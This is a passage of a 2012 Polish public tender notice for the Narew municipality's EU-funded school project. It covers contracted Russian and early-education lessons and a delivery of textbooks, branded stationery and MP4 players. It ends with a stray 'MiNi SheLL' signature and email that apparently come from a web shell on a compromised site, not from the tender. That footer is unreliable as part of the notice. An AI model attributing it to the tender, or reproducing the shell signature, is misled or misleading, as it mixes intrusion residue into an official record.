Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć (listy obecności, dzienniki zajęć, testy sprawdzające itp.).
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm.) oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych (Dz. U. Nr 100 poz. 1024).
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Działanie 4 - Przeprowadzenie zajęć z języka rosyjskiego dla uczniów Szkoły Podstawowej w Narwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu 60 godzin zajęć pozalekcyjnych z języka rosyjskiego z 10 osobową grupą uczniów Szkoły Podstawowej w Narwi wymagających podniesienia kompetencji z języka rosyjskiego, w ramach przygotowań do sprawdzianu szóstoklasisty, zgodnie z wymogami podstawy programowej z języka rosyjskiego w szkole podstawowej.
Zajęcia mają trwać 60 godzin lekcyjnych. Zajęcia odbywać się mają od października 2012 roku do kwietnia 2013 roku w dniach i godzinach wyznaczonych przez Zamawiającego.
Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Zajęcia realizowane będą z wykorzystaniem podręczników i ćwiczeń oraz zeszytów i długopisów dostarczonych przez Zamawiającego.



Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć z uwzględnieniem tematyki i liczby godzin zajęć oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji językowych m.in. testy, kartkówki. Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu test początkowy i test końcowy, a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć (listy obecności, dzienniki zajęć, testy sprawdzające itp..
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm. oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych Dz. U. Nr 100 poz. 1024.
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> . Działanie 5 - Przeprowadzenie zajęć z języka rosyjskiego dla uczniów Gimnazjum w Narwi.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu 60 godzin zajęć pozalekcyjnych z języka rosyjskiego z 10 osobową grupą uczniów Gimnazjum w Narwi wymagających podniesienia kompetencji z języka rosyjskiego, w ramach przygotowań do egzaminu gimnazjalnego, zgodnie z wymogami podstawy programowej z języka rosyjskiego w gimnazjum.
Zajęcia mają trwać 60 godzin lekcyjnych. Zajęcia odbywać się mają od października 2012 roku do kwietnia 2013 roku w dniach i godzinach wyznaczonych przez Zamawiającego.
Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Zajęcia realizowane będą z wykorzystaniem podręczników i ćwiczeń oraz zeszytów i długopisów dostarczonych przez Zamawiającego.

Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć z uwzględnieniem tematyki i liczby godzin zajęć oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji językowych m.in. testy, kartkówki. Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu test początkowy i test końcowy, a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć listy obecności, dzienniki zajęć, testy sprawdzające itp.
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm. oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych Dz. U. Nr 100 poz. 1024.
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Działanie 6 - Przeprowadzenie zajęć z zakresu edukacji wczesnoszkolnej dla uczniów Szkoły Podstawowej w Narwi..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na przeprowadzeniu 60 godzin zajęć pozalekcyjnych z zakresu edukacji wczesnoszkolnej z 10 osobową grupą uczniów Szkoły Podstawowej w Narwi wymagających podniesienia kompetencji w zakresie edukacji wczesnoszkolnej.
Zajęcia mają trwać 60 godzin lekcyjnych. Zajęcia odbywać się mają od października 2012 roku do maja 2013 roku w dniach i godzinach wyznaczonych przez Zamawiającego.
Harmonogram zajęć zostanie określony przez Zamawiającego i przekazany Wykonawcy.
Do przeprowadzenia zajęć Zamawiający zapewni sale lekcyjne w Zespole Szkolno-Przedszkolnym w Narwi.
Zajęcia realizowane będą z wykorzystaniem podręczników i ćwiczeń oraz zeszytów i długopisów dostarczonych przez Zamawiającego.

Zadania Wykonawcy:
Przygotowanie programu zajęć w formie pisemnej i przedstawienie go do akceptacji Dyrektorowi Zespołu Szkolno-Przedszkolnego w Narwi.
Prowadzenie zajęć zgodnie z opracowanym programem, w sposób gwarantujący realizację celów projektu.
Prowadzenie dzienników zajęć z uwzględnieniem tematyki i liczby godzin zajęć oraz list obecności na zajęciach.
Zapewnienie porządku w czasie zajęć, bezpieczeństwa uczniów uczestniczących w zajęciach oraz zgodnego z przeznaczeniem użytkowania sprzętu, materiałów i pomocy dydaktycznych.
Regularne monitorowanie postępów w nauce uczniów, poprzez przeprowadzanie różnych form weryfikacji przyrostu kompetencji m.in. testy, kartkówki. Obowiązkiem prowadzącego zajęcia jest sprawdzenie wiedzy uczniów na początku oraz na końcu kursu test początkowy i test końcowy, a także w trakcie jego trwania nie rzadziej niż raz na 2 miesiące.
Informowanie Zamawiającego o nieusprawiedliwionych nieobecnościach uczniów na zajęciach, jeżeli obejmują one więcej niż 3 kolejne spotkania lub więcej niż 8 spotkań w czasie trwania zajęć.
Niezwłoczne informowanie Koordynatora Projektu oraz Dyrektora Szkoły o każdym przypadku uniemożliwiającym realizację zajęć zgodnie z harmonogramem.
Informowanie pracowników zespołu zarządzającego projektem o wszelkich trudnościach w realizacji projektu oraz współpraca przy ich niwelowaniu.
Niezwłoczne udostępnienie dokumentacji z zakresu realizacji umowy na żądanie uprawnionego przedstawiciela Zamawiającego, Dyrektora Szkoły lub organu kontrolującego. Dotyczy to w szczególności dokumentacji z realizacji zajęć listy obecności, dzienniki zajęć, testy sprawdzające itp.
Przestrzeganie przepisów ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych Dz. U. Z 2002 r. Nr 101 poz. 926 z późn. zm. oraz rozporządzenia MSWiA z dnia 29 kwietnia 2004 r. w sprawie dokumentacji przetwarzania danych osobowych oraz warunków technicznych i organizacyjnych jakim powinny odpowiadać urządzenia i systemy informatyczne służące do przetwarzania danych osobowych Dz. U. Nr 100 poz. 1024.
Przekazanie do biura projektu kompletnej dokumentacji z realizacji zajęć po ich zakończeniu.
Zamawiający, Dyrektor Szkoły oraz inne upoważnione instytucje mają prawo do dokonania kontroli przebiegu i sposobu prowadzenia zajęć..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.10.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> . Działanie 7 - Zakup podręczników i ćwiczeń do zajęć z matematyki, języka rosyjskiego oraz edukacji wczesnoszkolnej, zakup zeszytów i przyborów piśmienniczych, zakup nagród dla uczniów uczestniczących w projekcie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Działanie polega na dostawie podręczników, ćwiczeń oraz zeszytów i przyborów piśmienniczych, które posłużą do realizacji zajęć pozalekcyjnych z matematyki, języka rosyjskiego oraz edukacji wczesnoszkolnej. Działanie obejmuje również dostawę nagród dla uczniów uczestniczących w zajęciach pozalekcyjnych w ramach projektu.
Wytyczne dotyczące zamawianych podręczników i ćwiczeń
Zamawiane podręczniki i ćwiczenia muszą być zgodne z aktualną podstawą programową w szkole podstawowej i gimnazjum.
Zamówieniem objęte są następujące zestawy podręczników i ćwiczeń:
	Podręcznik i ćwiczenia do matematyki do klasy VI szkoły podstawowej - 10 kompletów.
	Podręcznik i ćwiczenia do matematyki do klasy III gimnazjum - 10 kompletów
	Podręcznik i ćwiczenia do języka rosyjskiego do klasy VI szkoły podstawowej - 10 kompletów.
	Podręcznik i ćwiczenia do języka rosyjskiego do klasy III gimnazjum - 10 kompletów.
	Podręcznik i ćwiczenia do edukacji wczesnoszkolnej do klasy III szkoły podstawowej - 10 kompletów.
Przy wykorzystaniu podręczników i ćwiczeń będących przedmiotem zamówienia realizowane będą zajęcia pozalekcyjne w Zespole Szkolno-Przedszkolnym w Narwi, dlatego też oferowane podręczniki i ćwiczenia muszą być inne niż te, które wykorzystywane są obecnie w Zespole Szkolno-Przedszkolnym w Narwi do prowadzenia zajęć z poszczególnych przedmiotów w poszczególnych klasach.
Wykaz podręczników wykorzystywanych w Zespole Szkolno-Przedszkolnym w Narwi w roku szkolnym 2012 - 2013 stanowi załącznik nr 6 do SIWZ.
Podręczniki i ćwiczenia należy dostarczyć do Zespołu Szkolno Przedszkolnego w Narwi: ul. Mickiewicza 101 17-210 Narew w terminie do 30 października 2012 roku.

Wytyczne dotyczące zamawianych zeszytów i przyborów piśmienniczych:
Przedmiotem zamówienia jest 
1.	Dostawa 50 sztuk zeszytów  32 kartkowych w kratkę formatu A5. Okładka kolorowa, papier kreda błysk o gramaturze minimum 250 g z nadrukiem tytułu projektu - LEPSZY START - wyrównywanie szans edukacyjnych uczniów z gminy Narew, logotypami KAPITAŁ LUDZKI Narodowa Strategia Spójności oraz UNIA EUROPEJSKA Europejski Fundusz Społeczny zgodnie z wytycznymi oznaczania projektów w ramach projektu Kapitał Ludzki finansowanego ze środków Unii Europejskiej wraz z informacją Realizator projektu - Urząd Gminy Narew. Środek zeszytu - papier w kratkę offset gramatura minimum 80 g.
2.	Dostawa 50 sztuk długopisów z niebieskim wkładem z nadrukiem logotypów KAPITAŁ LUDZKI Narodowa Strategia Spójności oraz UNIA EUROPEJSKA Europejski Fundusz Społeczny zgodnie z wytycznymi oznaczania projektów w ramach projektu Kapitał Ludzki finansowanego ze środków Unii Europejskiej.
Projekty graficzne okładek zeszytów, długopisów przed dostawą winny być zaakceptowane przez Zamawiającego.
Zeszyty i przybory piśmiennicze należy dostarczyć do Zespołu Szkolno Przedszkolnego w Narwi: ul. Mickiewicza 101 17-210 Narew w terminie do 30 października 2012 roku.

Wytyczne dotyczące zamawianych nagród dla uczestników projektu:
Nagrodami dla uczniów uczestniczących w projekcie mają być odtwarzacze MP4.
Zamówienie obejmuje dostawę 100 odtwarzaczy MP4.
Specyfikacja odtwarzacza MP4:
	wbudowana pamięć - 2GB,
	wyświetlacz LCD: 1,5 - 1,8,
	wbudowane radio i funkcja dyktafonu,
	złącze stereo mini-jack, słuchawki,
	nadruk logotypów KAPITAŁ LUDZKI Narodowa Strategia Spójności oraz UNIA EUROPEJSKA Europejski Fundusz Społeczny zgodnie z wytycznymi oznaczania projektów w ramach projektu Kapitał Ludzki finansowanego ze środków Unii Europejskiej.

Odtwarzacze MP4 należy dostarczyć do Zespołu Szkolno Przedszkolnego w Narwi: ul. Mickiewicza 101
17-210 Narew w terminie do 30 kwietnia 2013 roku.
Płatność za dostarczone odtwarzacze MP4 zostanie dokonana w 2013 roku zgodnie z harmonogramem projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.11.10.00-1, 22.83.00.00-7, 30.19.21.30-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 1.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com